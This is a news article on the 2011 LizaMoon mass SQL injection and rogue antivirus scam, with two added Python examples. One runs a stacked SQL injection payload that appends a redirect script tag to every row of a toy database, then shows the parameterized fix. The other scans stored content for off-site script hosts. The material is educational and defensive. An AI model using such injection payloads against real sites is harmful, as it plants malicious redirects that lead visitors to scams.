'LizaMoon' Mass SQL Injection Attack Escalates Out of Control

By Fahmida Y. Rashid  |  Posted 2011-04-01
A mass SQL injection attack that initially compromised 28,000 Websites has spiraled out of control. At the last count, more than a million sites have been compromised, with no end in sight.

Security firm Websense has been tracking the "LizaMoon" attack since it started March 29. The company's malware researchers dubbed the attack LizaMoon after the first domain that victims were redirected to. At the redirected site, users saw a warning dialog that they had been infected with malware and a link to download a fake antivirus.

The users are shown a number of threats supposedly on their computer, but the fake AV, Windows Stability Center, won't remove them until the user pays up, in a "very traditional rogue AV scam," wrote Patrik Runald, the Websense researcher who has been following the attack over the past few days.

The list of redirect URLs has ballooned in the days since, as Websense updated its list March 31 with 20 additional sites, making this one of the biggest mass-injection attacks ever.

More than 500,000 URLs have been injected with LizaMoon, according to Runald. If all the domains used in the attack are considered, eWEEK found about 2.9 million results on Google Search that have been compromised.

"Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site," Runald said. It is safe to consider hundreds of thousands of domains have been hit, he said.

Websense researchers are still trying to figure out how the SQL injection attack is happening. Somehow, legitimate Websites have been compromised so that a single line of code is embedded in the site. That code is a simple redirect, and it executes when the user loads the page. The bulk of the action happens on the redirected page, where a script containing JavaScript code kicks off the fake AV scam.

Commenters asked Websense why researchers were so convinced it was a SQL injection on multiple Websites and not a mass cross-site scripting attack. The researchers said they'd been contacted by people who have seen the code in their Microsoft SQL Server 2003 and 2005 databases. The vulnerabilities weren't within the database software, but "most likely in the Web systems used by these sites, such as outdated CMS and blog systems," Runald said.
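The mechanism Websense describes, a Web application flaw that lets one request stamp the same redirect line onto every stored page, comes down to user input being pasted straight into SQL text. The following is an added example, not code from the article, Websense or any affected CMS: it builds a throwaway SQLite table (the `posts` table, its rows and the placeholder script URL are constructed for the demonstration) and runs the same search term through a string-concatenated query and through a parameterized one. SQLite's `executescript` stands in for legacy database drivers that execute several `;`-separated statements from one call, and `||` is SQLite's string concatenation.

```python
"""Added example (not from the eWEEK article or Websense): how a single
unsanitized query parameter lets one request append a redirect <script>
tag to every row, and how a parameterized query stores the same input
literally instead. Table, rows and the script URL are constructed."""
import sqlite3

# Placeholder, not a real LizaMoon domain.
INJECTED_TAG = '<script src="http://redirect-domain.example/x.js"></script>'

# A term that closes the LIKE string, adds an UPDATE, and comments out the rest.
STACKED_TERM = "x%'; UPDATE posts SET body = body || '" + INJECTED_TAG + "'; --"


def make_db():
    """Fresh in-memory database with three constructed pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO posts (title, body) VALUES (?, ?)",
        [("Welcome", "<p>Hello</p>"), ("About", "<p>About us</p>"), ("Contact", "<p>Mail us</p>")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """Legacy pattern: the search term is concatenated into the SQL text.
    executescript mimics drivers that run stacked statements, so an
    injected UPDATE rides along with the intended SELECT."""
    sql = "SELECT id, title FROM posts WHERE title LIKE '%" + term + "%'"
    conn.executescript(sql)


def search_parameterized(conn, term):
    """Hardened form: the term travels as a bound parameter, never as SQL."""
    sql = "SELECT id, title FROM posts WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def infected_rows(conn):
    """IDs of rows whose body now carries a <script> tag (none expected)."""
    rows = conn.execute("SELECT id FROM posts WHERE body LIKE '%<script%' ORDER BY id")
    return [r[0] for r in rows.fetchall()]


if __name__ == "__main__":
    vuln = make_db()
    search_vulnerable(vuln, STACKED_TERM)
    print("vulnerable search, rows carrying the tag:", infected_rows(vuln))   # [1, 2, 3]

    safe = make_db()
    print("parameterized search result:", search_parameterized(safe, STACKED_TERM))  # []
    print("parameterized search, rows carrying the tag:", infected_rows(safe))  # []
    print("normal search:", search_parameterized(safe, "Ab"))  # [(2, 'About')]
```

The first run shows why a compromised site ends up with the identical line in every record: the injected statement is one `UPDATE` across the whole table, not a per-page edit. The second run shows the fix is in the Web application layer, as Runald's comment suggests, and needs no change to the database server itself.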

Considering the large number of sites infected, users all around the world are affected, with victims in the United Kingdom, Kuwait, India, Australia, Turkey, Brazil, Israel, Mexico, Taiwan and Chile, among others, according to figures from Websense Threatseeker Network. The bulk of the victims, at 47 percent, appear to be from the United States.

The domains used in this attack, including the redirect URLs and the server where the malware is hosted, are all associated with one of four IP addresses, according to Dancho Danchev, an independent security expert. While the 20 or so domains being used as the redirect URL rotate between two IP addresses, Danchev has identified more than 120 India-based or Cocos Island-based domains all pointing to one malware host server, and 50 India-based domains going to another.

The domains have all been registered using automatically registered accounts at Gmail, Danchev said. The first domain on the list was registered as far back as October 2010, and new domains have been added since LizaMoon exploded, according to Runald.
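Because the injected line points at a small pool of rotating redirect domains, a site operator looking for it in stored content can group externally sourced `<script>` tags by host and inspect any host that is not one they deliberately use. The scanner below is an added example, not a Websense tool or anything from the article; the sample rows, the `cdn.example` allowlist and the `bad-redirect.example` host are all constructed placeholders.

```python
"""Added example (not from the article or Websense): scan stored page
content for externally sourced <script> tags and group them by host, so
a rotating pool of injected redirect domains stands out from the site's
own scripts. Sample rows and host names are constructed placeholders."""
import re
from collections import defaultdict

# Matches src="..." inside a <script ...> tag and captures the host of an
# absolute (http://, https:// or protocol-relative //) URL. Relative paths
# such as /js/app.js are deliberately ignored as same-origin.
SCRIPT_SRC = re.compile(
    r'<script\b[^>]*?\bsrc\s*=\s*["\']?\s*(?:https?:)?//([^/"\'>\s]+)',
    re.IGNORECASE,
)


def offsite_script_hosts(text, allowed_hosts):
    """Hosts of script tags in `text` that are not on the allowlist."""
    hosts = [h.lower() for h in SCRIPT_SRC.findall(text)]
    return [h for h in hosts if h not in allowed_hosts]


def scan_rows(rows, allowed_hosts):
    """rows: iterable of (row_id, text). Returns {host: [row_id, ...]} so
    one host hitting many rows, the mass-injection signature, is obvious."""
    hits = defaultdict(list)
    for row_id, text in rows:
        for host in offsite_script_hosts(text, allowed_hosts):
            hits[host].append(row_id)
    return dict(hits)


# Constructed sample content, as it might sit in a CMS body column.
SAMPLE_ROWS = [
    (1, '<p>Hello</p><script src="/js/app.js"></script>'),
    (2, '<p>About</p><script src="https://cdn.example/lib.js"></script>'),
    (3, '<p>Contact</p><script src="http://bad-redirect.example/x.js"></script>'),
    (4, '<p>News</p><SCRIPT SRC=http://bad-redirect.example/x.js></SCRIPT>'),
]
ALLOWED = {"cdn.example", "www.example.org"}

if __name__ == "__main__":
    for host, ids in sorted(scan_rows(SAMPLE_ROWS, ALLOWED).items()):
        print(f"{host}: {len(ids)} rows {ids}")   # bad-redirect.example: 2 rows [3, 4]
```

Running the same scan over every text column of the site's database (or over its rendered HTML) gives the list of affected records to clean and the hosts to block at the proxy; it also catches the unquoted, upper-case variant of the tag, which a simple substring search for a known domain would miss once the attacker rotates to the next one.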

First, the good news: Users are hit with the Windows Stability Center scam only once, so visiting the site repeatedly doesn't repeat the attack.

The bad news: Not many antivirus programs seem to be able to detect the Windows Stability Center. VirusTotal is a service that checks malware samples against 43 major antivirus products to see which products can detect it. As of April 1, only 17 out of the 43 tested block Windows Stability Scanner. At least security companies are moving on this threat: It was only 13 out of 43 on March 31.
